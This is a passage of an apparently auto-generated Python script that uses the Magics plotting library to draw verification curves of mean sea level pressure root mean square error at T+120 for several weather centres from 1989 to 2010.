4.14000000e+00, 4.70000000e+00, 4.83000000e+00])) #264
mpp.setc('graph_missing_data_colour','blue')
mpp.seti('graph_symbol_marker_index',4)
mpp.setc('graph_symbol_colour','blue')
mpp.setc('graph_missing_data_style','solid')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','solid')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 5.20000000e+00, 5.50000000e+00, 4.70000000e+00,
4.60000000e+00, 3.90000000e+00, 3.70000000e+00,
3.40000000e+00, 3.60000000e+00, 4.00000000e+00,
4.30000000e+00, 4.80000000e+00, 4.90000000e+00,
5.10000000e+00, 4.50000000e+00, 4.70000000e+00,
4.40000000e+00, 3.90000000e+00, 3.50000000e+00,
3.30000000e+00, 3.50000000e+00, 3.90000000e+00,
4.50000000e+00, 4.50000000e+00, 5.00000000e+00,
5.10000000e+00, 5.00000000e+00, 4.50000000e+00,
4.40000000e+00, 4.00000000e+00, 3.70000000e+00,
3.30000000e+00, 3.30000000e+00, 3.80000000e+00,
4.30000000e+00, 4.20000000e+00, 5.00000000e+00,
4.70000000e+00, 4.80000000e+00, 4.40000000e+00,
4.20000000e+00, 3.70000000e+00, 3.40000000e+00,
3.30000000e+00, 3.50000000e+00, 4.00000000e+00,
4.00000000e+00, 4.70000000e+00, 4.90000000e+00,
4.80000000e+00, 4.90000000e+00, 4.80000000e+00,
4.00000000e+00, 3.70000000e+00, 3.20000000e+00,
3.10000000e+00, 3.30000000e+00, 3.60000000e+00,
4.20000000e+00, 4.50000000e+00, 4.70000000e+00,
4.50000000e+00, 4.80000000e+00, 4.40000000e+00,
4.00000000e+00, 3.60000000e+00, 3.20000000e+00,
3.30000000e+00, 3.10000000e+00, 3.60000000e+00,
4.10000000e+00, 4.70000000e+00, 4.80000000e+00,
4.70000000e+00, 4.70000000e+00, 4.80000000e+00,
3.90000000e+00, 3.60000000e+00, 3.40000000e+00,
2.90000000e+00, 3.10000000e+00, 3.70000000e+00,
4.10000000e+00, 4.50000000e+00, 4.10000000e+00,
4.60000000e+00, 4.50000000e+00, 4.20000000e+00,
3.60000000e+00, 3.30000000e+00, 2.80000000e+00,
2.80000000e+00, 2.90000000e+00, 3.50000000e+00,
3.90000000e+00, 4.60000000e+00, 4.70000000e+00,
4.70000000e+00, 4.30000000e+00, 4.50000000e+00,
4.20000000e+00, 3.50000000e+00, 3.40000000e+00,
2.80000000e+00, 3.20000000e+00, 3.50000000e+00,
4.10000000e+00, 4.40000000e+00, 4.50000000e+00,
4.40000000e+00, 4.30000000e+00, 4.10000000e+00,
3.80000000e+00, 3.40000000e+00, 3.20000000e+00,
3.00000000e+00, 3.30000000e+00, 3.90000000e+00,
3.90000000e+00, 3.70000000e+00, 4.40000000e+00,
4.40000000e+00, 4.20000000e+00, 3.80000000e+00,
3.50000000e+00, 3.10000000e+00, 3.00000000e+00,
2.90000000e+00, 2.90000000e+00, 3.20000000e+00,
3.60000000e+00, 4.00000000e+00, 4.20000000e+00,
4.30000000e+00, 4.00000000e+00, 3.70000000e+00,
3.40000000e+00, 3.00000000e+00, 3.00000000e+00,
2.70000000e+00, 2.70000000e+00, 1.70000000e+38,
3.40000000e+00, 3.70000000e+00, 4.10000000e+00,
3.90000000e+00, 4.00000000e+00, 3.70000000e+00,
3.60000000e+00, 3.00000000e+00, 2.50000000e+00,
2.30000000e+00, 2.40000000e+00, 2.80000000e+00,
3.20000000e+00, 3.70000000e+00, 3.80000000e+00,
3.80000000e+00, 3.80000000e+00, 3.70000000e+00,
3.20000000e+00, 2.80000000e+00, 1.70000000e+38,
2.40000000e+00, 2.40000000e+00, 2.80000000e+00,
3.20000000e+00, 3.40000000e+00, 3.70000000e+00,
3.70000000e+00, 3.70000000e+00, 3.60000000e+00,
3.10000000e+00, 2.80000000e+00, 2.40000000e+00,
2.20000000e+00, 2.30000000e+00, 2.80000000e+00,
3.20000000e+00, 3.30000000e+00, 3.70000000e+00,
3.90000000e+00, 3.80000000e+00, 3.60000000e+00,
3.10000000e+00, 2.50000000e+00, 2.30000000e+00,
2.10000000e+00, 2.30000000e+00, 2.80000000e+00,
3.00000000e+00, 3.40000000e+00, 3.80000000e+00,
3.60000000e+00, 3.80000000e+00, 3.30000000e+00,
2.90000000e+00, 2.60000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.30000000e+00,
2.50000000e+00, 2.90000000e+00, 3.00000000e+00,
3.10000000e+00, 3.10000000e+00, 3.00000000e+00,
2.50000000e+00, 2.40000000e+00, 2.20000000e+00,
2.10000000e+00, 2.00000000e+00, 2.40000000e+00,
2.60000000e+00, 2.90000000e+00, 3.20000000e+00,
3.10000000e+00, 3.10000000e+00, 3.00000000e+00,
2.70000000e+00, 2.40000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.20000000e+00,
2.60000000e+00, 2.80000000e+00, 3.00000000e+00,
3.20000000e+00, 3.00000000e+00, 2.70000000e+00,
2.50000000e+00, 2.30000000e+00, 2.20000000e+00,
2.10000000e+00, 2.10000000e+00, 2.20000000e+00,
2.70000000e+00, 2.70000000e+00, 3.10000000e+00,
3.10000000e+00, 2.80000000e+00, 3.00000000e+00,
2.50000000e+00, 2.30000000e+00, 2.00000000e+00,
2.10000000e+00, 2.10000000e+00, 2.30000000e+00,
2.60000000e+00, 2.80000000e+00, 2.90000000e+00,
2.90000000e+00, 2.80000000e+00, 2.80000000e+00,
2.60000000e+00, 2.20000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.10000000e+00,
2.40000000e+00, 2.70000000e+00, 2.90000000e+00])) #264
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',5)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','dot')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dot')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 7.70000000e+00, 8.40000000e+00, 7.40000000e+00,
7.00000000e+00, 5.80000000e+00, 5.30000000e+00,
4.90000000e+00, 5.20000000e+00, 6.00000000e+00,
6.90000000e+00, 7.40000000e+00, 7.60000000e+00,
7.40000000e+00, 6.90000000e+00, 7.40000000e+00,
6.70000000e+00, 5.90000000e+00, 5.20000000e+00,
4.80000000e+00, 4.90000000e+00, 5.90000000e+00,
6.70000000e+00, 7.50000000e+00, 7.90000000e+00,
7.80000000e+00, 7.60000000e+00, 7.10000000e+00,
6.70000000e+00, 5.80000000e+00, 5.30000000e+00,
4.60000000e+00, 5.00000000e+00, 5.60000000e+00,
6.70000000e+00, 7.10000000e+00, 8.10000000e+00,
7.30000000e+00, 7.60000000e+00, 7.20000000e+00,
6.60000000e+00, 5.60000000e+00, 5.10000000e+00,
4.70000000e+00, 4.80000000e+00, 6.30000000e+00,
6.30000000e+00, 7.10000000e+00, 7.80000000e+00,
7.90000000e+00, 7.80000000e+00, 7.90000000e+00,
6.40000000e+00, 5.70000000e+00, 4.90000000e+00,
4.60000000e+00, 4.50000000e+00, 5.70000000e+00,
6.50000000e+00, 7.10000000e+00, 7.80000000e+00,
7.50000000e+00, 8.00000000e+00, 7.10000000e+00,
6.60000000e+00, 5.70000000e+00, 5.10000000e+00,
4.80000000e+00, 4.40000000e+00, 5.50000000e+00,
6.40000000e+00, 7.30000000e+00, 7.70000000e+00,
7.70000000e+00, 7.40000000e+00, 8.00000000e+00,
6.60000000e+00, 5.40000000e+00, 5.20000000e+00,
4.30000000e+00, 4.50000000e+00, 5.60000000e+00,
6.60000000e+00, 7.30000000e+00, 6.30000000e+00,
7.30000000e+00, 7.10000000e+00, 6.60000000e+00,
5.70000000e+00, 5.40000000e+00, 4.50000000e+00,
4.30000000e+00, 4.40000000e+00, 5.40000000e+00,
6.10000000e+00, 7.60000000e+00, 7.20000000e+00,
7.30000000e+00, 6.80000000e+00, 7.10000000e+00,
6.30000000e+00, 5.40000000e+00, 5.10000000e+00,
4.20000000e+00, 4.80000000e+00, 5.30000000e+00,
6.60000000e+00, 6.80000000e+00, 6.90000000e+00,
6.80000000e+00, 6.60000000e+00, 6.80000000e+00,
6.10000000e+00, 5.30000000e+00, 4.80000000e+00,
4.60000000e+00, 4.80000000e+00, 6.20000000e+00,
6.20000000e+00, 6.10000000e+00, 7.20000000e+00,
7.20000000e+00, 7.30000000e+00, 6.40000000e+00,
5.70000000e+00, 5.30000000e+00, 4.80000000e+00,
4.40000000e+00, 4.40000000e+00, 5.30000000e+00,
5.80000000e+00, 6.90000000e+00, 6.60000000e+00,
7.20000000e+00, 6.50000000e+00, 6.30000000e+00,
5.80000000e+00, 5.20000000e+00, 4.80000000e+00,
4.30000000e+00, 4.30000000e+00, 1.70000000e+38,
5.70000000e+00, 6.00000000e+00, 6.70000000e+00,
6.30000000e+00, 7.00000000e+00, 6.10000000e+00,
6.20000000e+00, 5.10000000e+00, 4.10000000e+00,
3.80000000e+00, 3.80000000e+00, 4.70000000e+00,
5.30000000e+00, 5.90000000e+00, 6.20000000e+00,
6.10000000e+00, 6.40000000e+00, 6.20000000e+00,
5.70000000e+00, 4.60000000e+00, 1.70000000e+38,
4.00000000e+00, 3.80000000e+00, 4.90000000e+00,
5.40000000e+00, 5.60000000e+00, 6.40000000e+00,
6.30000000e+00, 6.20000000e+00, 6.00000000e+00,
5.20000000e+00, 4.60000000e+00, 3.90000000e+00,
3.60000000e+00, 3.80000000e+00, 5.00000000e+00,
5.70000000e+00, 5.90000000e+00, 6.20000000e+00,
6.40000000e+00, 6.20000000e+00, 6.20000000e+00,
5.00000000e+00, 4.50000000e+00, 4.00000000e+00,
3.40000000e+00, 3.80000000e+00, 4.60000000e+00,
5.30000000e+00, 5.80000000e+00, 6.40000000e+00,
6.20000000e+00, 6.30000000e+00, 5.60000000e+00,
5.00000000e+00, 4.40000000e+00, 3.80000000e+00,
3.40000000e+00, 3.60000000e+00, 4.60000000e+00,
5.00000000e+00, 5.30000000e+00, 5.50000000e+00,
5.40000000e+00, 5.50000000e+00, 5.50000000e+00,
4.60000000e+00, 4.10000000e+00, 3.60000000e+00,
3.60000000e+00, 3.30000000e+00, 4.50000000e+00,
4.80000000e+00, 5.60000000e+00, 5.50000000e+00,
5.30000000e+00, 5.60000000e+00, 5.10000000e+00,
4.60000000e+00, 4.30000000e+00, 3.70000000e+00,
3.10000000e+00, 3.60000000e+00, 3.90000000e+00,
4.80000000e+00, 5.30000000e+00, 5.50000000e+00,
5.20000000e+00, 5.40000000e+00, 5.20000000e+00,
4.70000000e+00, 4.10000000e+00, 3.90000000e+00,
3.50000000e+00, 3.60000000e+00, 4.00000000e+00,
5.00000000e+00, 5.10000000e+00, 5.80000000e+00,
5.20000000e+00, 5.00000000e+00, 5.50000000e+00,
4.40000000e+00, 4.20000000e+00, 3.60000000e+00,
3.60000000e+00, 3.80000000e+00, 4.00000000e+00,
4.80000000e+00, 5.10000000e+00, 5.50000000e+00,
5.30000000e+00, 5.20000000e+00, 5.00000000e+00,
4.90000000e+00, 3.90000000e+00, 3.60000000e+00,
3.60000000e+00, 3.30000000e+00, 3.80000000e+00,
4.30000000e+00, 5.10000000e+00, 5.00000000e+00])) #264
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',6)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','chain_dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('output_name','verify')
mpp.setc('subpage_map_projection','none')
mpp.setc('subpage_map_projection','none')
mpp.new_page('SUPER_PAGE')
mpp.setr('page_x_length',29.7)
mpp.setr('page_y_length',21.0)
mpp.setr('super_page_x_length',29.7)
mpp.setc('page_id_line','off')
mpp.setc('page_id_line_user_text','Verify/MetPy devel')
mpp.setc('page_frame','on')
mpp.setr('super_page_y_length',21.0)
mpp.setr('page_x_length',29.7)
mpp.setc('layout','positional')
mpp.setr('page_x_position',0.0)
mpp.setr('page_y_position',0.0)
mpp.setr('page_y_length',21.0)
mpp.reset('legend_box_x_position')
mpp.reset('legend_box_blanking')
mpp.reset('legend_text_composition')
mpp.reset('legend_box_y_position')
mpp.reset('legend_box_x_length')
mpp.reset('legend_user_lines')
mpp.reset('legend_column_count')
mpp.reset('legend_text_font_size')
mpp.reset('legend_box_mode')
mpp.reset('legend_text_colour')
mpp.reset('legend_box_y_length')
mpp.reset('legend')
mpp.reset('legend_entry_plot_direction')
mpp.setc('page_frame','off')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('text_box_x_length',20.879099999999998)
mpp.setr('text_box_x_position',2.0344500000000005)
mpp.setr('text_box_y_length',5.586)
mpp.setc('subpage_frame','off')
mpp.setr('text_box_y_position',15.056999999999999)
mpp.setc('text_mode','positional')
mpp.setr('text_font_size',0.6)
mpp.setc('text_justification','left')
mpp.set1c('text_lines',['<font size="0.72"><b> </b></font>', ' <font size="0.54">Mean sea level pressure</font>', ' <font size="0.54">Root mean square error</font>', ' <font size="0.54">NHem Extratropics <font size=\'0.36\'>(lat 20.0 to 90.0, lon -180.0 to 180.0)</font></font>', ' <font size="0.54">T+120 </font>', ' <font size="0.36">wmo_an od 0001 | 00UTC,verifying</font>'])
mpp.seti('text_line_count',6)
mpp.setc('text_html','on')
mpp.setc('text_colour','black')
mpp.text()
mpp.reset('text_mode')
mpp.reset('text_font_size')
mpp.reset('text_justification')
mpp.reset('text_lines')
mpp.reset('text_line_count')
mpp.reset('text_html')
mpp.reset('text_colour')
mpp.reset('text_box_x_length')
mpp.reset('text_box_x_position')
mpp.reset('text_box_y_length')
mpp.reset('subpage_frame')
mpp.reset('text_box_y_position')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('legend_box_x_position',16.335)
mpp.setc('legend_box_blanking','off')
mpp.setc('legend_text_composition','user_text_only')
mpp.setr('legend_box_y_position',15.120000000000001)
mpp.setr('legend_box_x_length',11.88)
mpp.set1c('legend_user_lines',['ECMWF 12utc T+120', 'JMA 12utc T+120', 'UKMO 12utc T+120', 'NCEP 00utc T+120'])
mpp.seti('legend_column_count',1)
mpp.setr('legend_text_font_size',0.4)
mpp.setc('legend_box_mode','positional')
mpp.setc('legend_text_colour','black')
mpp.setr('legend_box_y_length',3.2)
mpp.setc('legend','on')
mpp.setc('legend_entry_plot_direction','column')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_x_length',25.541999999999998)
mpp.setr('subpage_x_position',2.97)
mpp.setc('layout','positional')
mpp.setr('subpage_y_position',2.3100000000000005)
mpp.setr('subpage_y_length',12.6)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_horizontal_axis_height',1.5)
mpp.setr('axis_tick_interval',1.0)
mpp.setc('axis_months_label','off')
mpp.setc('axis_date_min_value','1989-01-01')
mpp.setc('axis_type','date')
mpp.setc('axis_tick_label_position','inter_tick')
mpp.setc('axis_years_label','on')
mpp.setc('axis_title','off')
mpp.setc('axis_grid','on')
mpp.setr('axis_days_label_height',0.4)
mpp.setr('axis_months_label_height',0.4)
mpp.setc('axis_date_max_value','2010-12-01')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_date_type','years')
mpp.setr('axis_years_label_height',0.4)
mpp.setc('axis_minor_tick','off')
mpp.setc('axis_grid_colour','black')
mpp.setc('axis_days_label','off')
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_tick_interval')
mpp.reset('axis_months_label')
mpp.reset('axis_date_min_value')
mpp.reset('axis_type')
mpp.reset('axis_tick_label_position')
mpp.reset('axis_years_label')
mpp.reset('axis_title')
mpp.reset('axis_grid')
mpp.reset('axis_days_label_height')
mpp.reset('axis_months_label_height')
mpp.reset('axis_date_max_value')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_date_type')
mpp.reset('axis_years_label_height')
mpp.reset('axis_minor_tick')
mpp.reset('axis_grid_colour')
mpp.reset('axis_days_label')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_vertical_axis_width',1.5)
mpp.setc('axis_title_text','hPa')
